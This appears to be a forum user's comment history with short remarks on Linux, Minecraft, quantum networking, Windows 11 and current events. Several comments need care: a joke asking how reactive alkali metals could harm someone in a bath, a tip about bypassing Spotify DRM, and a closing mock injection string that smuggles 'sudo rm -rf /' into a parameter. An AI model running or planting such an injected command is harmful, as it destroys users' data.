Your average science guy, Linux nerd, and Minecraft player. Left Reddit for this place and haven’t looked back. :)
Just so you know, your name’s visible in the “Gemini crashes” image.
As a Minnesotan, that would be very bad news for anyone here enjoying having relatively okay power bills. Unfortunately I have to agree with Ford; we totally deserve it.
Obviously always issuing deletion orders would be a good thing, but it doesn’t seem like it would be very effective. It would be all too easy for the offender to stash a backup flash drive somewhere before “complying” with the order.
If computers can do it, so can you!
On my phone the site is very stuttery when scrolling. Could be a problem on my end but maybe do some profiling to see if it’s using a lot of resources and test it on lower end devices?
George Orwell’s 1984 becomes more of a reality every day.
Would sodium make a good bath bomb, or would a liquid sodium-potassium alloy be better? What about cesium, if price is no concern? How effective would such a bomb be against someone taking a bath? What’s the best delivery method; maybe something that dissolves in water like dishwasher pods?
I’m reasonably sure nobody has thought that before.
Lmao, did anyone expect something different? Never buy a product that becomes a brick when the company that made it goes under.
You could make /tmp a ramdisk which probably has some speed benefits.
I think I’m a bit spoiled with my 144 Hz monitor; anything below maybe 120 FPS starts to bug me. Thankfully my PC is pretty powerful and I don’t really play graphics-heavy games (mostly just Minecraft) so my framerate is usually quite stable.
Spotify has DRM, but it’s relatively easy to bypass with something like librespot if you want to download tracks.
Yep, people will fight hard to defend against a foreign invasion. We’re seeing it with Russia and Ukraine right now.
You can copy and paste the video URL into the Wayback Machine, if it’s decently popular there’s a good chance the title and maybe even the video itself is archived.
Yeah that got automatically enabled on my phone after an update… Guess how I found out?
That’s not entirely correct, they did use a fiber optic cable to transfer the data, as the more detailed article linked in another comment states. Quantum entanglement itself can’t be used to transfer data; you still need to send the entangled particles through some physical means.
From what I understand, the significance is that you can transfer the states around while keeping them in a superposition. Thus you can continue to perform computations with them even after moving them to a physically separate quantum computer.
A toilet paper roll is topologically a torus, which has one hole, so that’s easy. The other ones though…
Making Win 11 even harder to install is a bold move from Microsoft. Most average users are content with using the OS that comes with their PC and upgrading it when necessary. But if the option is to either buy a new PC or fiddle with registry settings in hope that Win 11 will work, I think a lot more people will start looking at Linux instead.
[...]®ister=import os; os.system("sudo rm -rf /"); return True